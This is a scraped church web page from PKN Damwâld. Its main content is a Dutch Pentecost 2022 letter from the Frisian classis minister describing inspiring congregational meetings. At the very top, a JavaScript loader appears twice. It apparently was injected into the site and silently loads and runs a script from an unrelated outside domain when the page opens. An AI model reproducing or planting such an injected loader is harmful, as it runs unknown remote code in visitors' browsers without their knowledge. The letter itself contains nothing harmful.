;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Pinksterboodschap 2022 ... Aan de gemeenten, kerkenraden en voorgangers van de Protestantse Classis Fryslân. - PKN Damwâld

Pinksterboodschap 2022 … Aan de gemeenten, kerkenraden en voorgangers van de Protestantse Classis Fryslân.

Gepubliceerd op: vrijdag 3 juni 2022

Bezielde medegelovigen,

De afgelopen weken heeft een groot aantal medegelovigen mij bezield. Om te beginnen twee weken geleden op de zaterdag toen wij als classis gastvrij zijn ontvangen in de Protestantse Gemeente van Workum.

Honderddertig leden van Friese gemeenten en kerkenraden ontmoetten elkaar, bemoedigden en inspireerden elkaar. In wat tijdens het programma gezegd en gehoord werd, maar minstens zoveel in de wandelgangen, onder de koffie en tijdens de maaltijd. Ik ademde op van de geest van vreugde en hartelijkheid.

De weken daarna was ik te gast in twee kleine gemeenten. Niet de zorg over de kwetsbaarheid en de vrees voor de toekomst stempelde de geest van onze ontmoeting, maar de nieuwe wegen die men had gevonden.

Eén gemeente vertelde trots hoe zij een dominee van een naburig dorp bereid had gevonden voor een aantal uren ook herder in hun gemeente te worden. En hoe de ouderlingen en diakenen die lang, heel lang, de gemeente op hun schouders gedragen hadden, jonge opvolgers gevonden hebben om de vlam van hen over te nemen.

In de andere gemeente mocht ik vijf nieuwe, deels jonge ambtsdragers bevestigen. En afscheid nemen van drie anderen die trouw jaar in jaar uit het ambt in deze kleine gemeente hebben gedragen, en de Godslamp brandend gehouden. Het was een inspirerende dienst.

Het zijn vaak mijn medegelovigen die mij bezielen. Waar zij zich in het hart laten kijken, innerlijk vertrouwen delen, God ervaren, inzet tonen, trouw zijn, bewogen worden door nood en onrecht, creatief blijken. Een geest ademen van volharding, geloof, hoop en liefde vinden, in vroeger en nu.

Met hun bezieling, en die van allen in onze classis, leef ik toe naar het Pinksterfeest. Zie ik uit naar de Geest van God die, tot onze verrassing en verwondering, ons zal overkomen, juist op de momenten dat wij het niet verwachten.

Kom, Geest van God,
maak onze harten open,
dat Christus bij ons woning vindt.

Liedboek Zingen en bidden in huis en kerk 333

Ik wens u een gezegend Pinksterfeest.

Wim Beekman,
Classisdominee Fryslân